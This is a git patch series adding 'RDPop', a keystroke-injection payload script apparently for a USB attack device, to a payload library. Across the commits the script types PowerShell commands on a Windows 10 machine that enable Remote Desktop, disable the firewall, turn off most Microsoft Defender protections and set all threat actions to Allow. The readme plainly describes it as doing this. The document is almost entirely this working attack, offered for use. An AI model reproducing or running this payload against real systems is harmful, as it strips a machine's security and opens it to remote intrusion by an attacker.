From 698bbb42dd4ea9e74e63f858d3e1c172a70fc670 Mon Sep 17 00:00:00 2001 From: C08W38101 Date: Fri, 14 Jun 2024 13:03:24 -0500 Subject: [PATCH 1/7] Create placeholder --- payloads/library/general/rdpop/placeholder | 1 + 1 file changed, 1 insertion(+) create mode 100644 payloads/library/general/rdpop/placeholder diff --git a/payloads/library/general/rdpop/placeholder b/payloads/library/general/rdpop/placeholder new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/payloads/library/general/rdpop/placeholder @@ -0,0 +1 @@ + From 7ec6bf5c0fb7f2f8ce0e11d763adb4d5c97add9f Mon Sep 17 00:00:00 2001 From: C08W38101 Date: Fri, 14 Jun 2024 13:04:16 -0500 Subject: [PATCH 2/7] Add files via upload --- payloads/library/general/rdpop/payload.txt | 32 ++++++++++++++++++++++ payloads/library/general/rdpop/readme.md | 1 + 2 files changed, 33 insertions(+) create mode 100644 payloads/library/general/rdpop/payload.txt create mode 100644 payloads/library/general/rdpop/readme.md diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt new file mode 100644 index 0000000..83e2076 --- /dev/null +++ b/payloads/library/general/rdpop/payload.txt @@ -0,0 +1,32 @@ +GUI STRING r +STRING powershell +ENTER +STRING Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 +ENTER +STRING Set-NetFirewallProfile -Enabled False +ENTER +STRING Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue +ENTER +STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue \ No newline at end of file diff --git a/payloads/library/general/rdpop/readme.md b/payloads/library/general/rdpop/readme.md new file mode 100644 index 0000000..22d1d5f --- /dev/null +++ b/payloads/library/general/rdpop/readme.md @@ -0,0 +1 @@ +a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender \ No newline at end of file From d045b0abdf8b010e564ba5c28895f563ff5241d3 Mon Sep 17 00:00:00 2001 From: C08W38101 Date: Fri, 14 Jun 2024 13:36:25 -0500 Subject: [PATCH 3/7] Update payload.txt --- payloads/library/general/rdpop/payload.txt | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt index 83e2076..2c879d1 100644 --- a/payloads/library/general/rdpop/payload.txt +++ b/payloads/library/general/rdpop/payload.txt @@ -1,3 +1,7 @@ +REM title RDPop +REM description removes restrictions and enables rdp, if given admin privileges +REM author C08W38101 +REM target windows 10 GUI STRING r STRING powershell ENTER @@ -29,4 +33,5 @@ STRING Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyConti ENTER STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue ENTER -STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue \ No newline at end of file +STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue +CTRL STRING W From 65f89f2f1d4081005f59af1ba3b498ccf624be17 Mon Sep 17 00:00:00 2001 From: C08W38101 Date: Fri, 14 Jun 2024 17:37:43 -0500 Subject: [PATCH 4/7] Update payload.txt --- payloads/library/general/rdpop/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt index 2c879d1..75713a7 100644 --- a/payloads/library/general/rdpop/payload.txt +++ b/payloads/library/general/rdpop/payload.txt @@ -2,7 +2,7 @@ REM title RDPop REM description removes restrictions and enables rdp, if given admin privileges REM author C08W38101 REM target windows 10 -GUI STRING r +GUI r STRING powershell ENTER STRING Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 @@ -34,4 +34,4 @@ ENTER STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue ENTER STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue -CTRL STRING W +CTRL W From c78feeffcbc891c43495b93141d4560d4d4344d4 Mon Sep 17 00:00:00 2001 From: C08W38101 Date: Fri, 14 Jun 2024 17:55:45 -0500 Subject: [PATCH 5/7] Update payload.txt --- payloads/library/general/rdpop/payload.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt index 75713a7..648312d 100644 --- a/payloads/library/general/rdpop/payload.txt +++ b/payloads/library/general/rdpop/payload.txt @@ -2,6 +2,7 @@ REM title RDPop REM description removes restrictions and enables rdp, if given admin privileges REM author C08W38101 REM target windows 10 +DEFAULT_DELAY 500 GUI r STRING powershell ENTER From 9f8badfd39b83e81005e7b4ff259e8c3123fa2e5 Mon Sep 17 00:00:00 2001 From: C08W38101 Date: Fri, 14 Jun 2024 18:03:04 -0500 Subject: [PATCH 6/7] Update payload.txt --- payloads/library/general/rdpop/payload.txt | 44 ++++++++-------------- 1 file changed, 15 insertions(+), 29 deletions(-) diff --git a/payloads/library/general/rdpop/payload.txt b/payloads/library/general/rdpop/payload.txt index 648312d..3aa0aea 100644 --- a/payloads/library/general/rdpop/payload.txt +++ b/payloads/library/general/rdpop/payload.txt @@ -6,33 +6,19 @@ DEFAULT_DELAY 500 GUI r STRING powershell ENTER -STRING Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 -ENTER -STRING Set-NetFirewallProfile -Enabled False -ENTER -STRING Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue -ENTER -STRING Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue +STRINGLN Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 +STRINGLN Set-NetFirewallProfile -Enabled False +STRINGLN Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue +STRINGLN Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue CTRL W From 41e8a7ee2216c8598e81071a23424d47d158f75c Mon Sep 17 00:00:00 2001 From: C08W38101 Date: Sat, 15 Jun 2024 12:38:23 -0500 Subject: [PATCH 7/7] Update readme.md --- payloads/library/general/rdpop/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/general/rdpop/readme.md b/payloads/library/general/rdpop/readme.md index 22d1d5f..a87b060 100644 --- a/payloads/library/general/rdpop/readme.md +++ b/payloads/library/general/rdpop/readme.md @@ -1 +1 @@ -a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender \ No newline at end of file +a payload I made without owning any gear, it enables rdp, disables firewall, and disables defender cobweb